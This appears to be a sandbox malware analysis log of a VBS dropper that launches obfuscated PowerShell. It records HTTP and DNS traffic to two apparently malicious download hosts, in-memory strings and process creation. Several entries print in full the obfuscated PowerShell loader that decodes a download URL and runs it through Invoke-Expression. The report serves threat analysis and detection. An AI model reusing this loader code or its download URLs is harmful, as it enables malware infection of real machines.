      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wh/Subordinerendes78.smi HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
      Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:41:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:41:58 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:42:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:42:10 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:42:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:42:22 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:42:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:42:33 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:42:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:42:45 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:42:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:42:57 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:43:09 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:43:20 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:43:32 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:43:44 GMTserver: LiteSpeed
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:43:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC5FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB4CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAC81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Subordinerendes78.smi
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BC1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC5EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBC59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
      Source: powershell.exe, 00000001.00000002.2980240959.00000273BAEA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.4:49732 version: TLS 1.2

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B834F341_2_00007FFD9B834F34
      Source: mg.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8173Jump to behavior
      Source: classification engineClassification label: mal100.expl.evad.winVBS@6/3@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Succesfulde.bloJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj1qlplk.h1d.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: mg.vbsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mg.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. 